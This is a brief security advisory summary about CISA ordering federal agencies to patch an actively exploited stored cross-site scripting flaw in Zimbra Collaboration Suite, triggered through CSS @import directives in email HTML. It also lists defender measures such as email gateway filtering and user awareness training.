CISA has ordered U.S. federal agencies to patch a high-severity stored cross-site scripting (XSS) flaw, CVE-2025-66376, in Zimbra Collaboration Suite (ZCS) that is actively exploited. Attackers abuse CSS @import directives in email HTML to execute arbitrary JavaScript, potentially leading to user session hijacking and sensitive data theft.
Initial Access
Malicious Email Ingress
confirmed
Attackers deliver malicious HTML-based emails containing crafted Cascading Style Sheets (CSS) @import directives to target Zimbra Collaboration Suite users.
Defender cut points
Implement robust email gateway filtering for malicious HTML contentConduct user awareness training on identifying suspicious email content
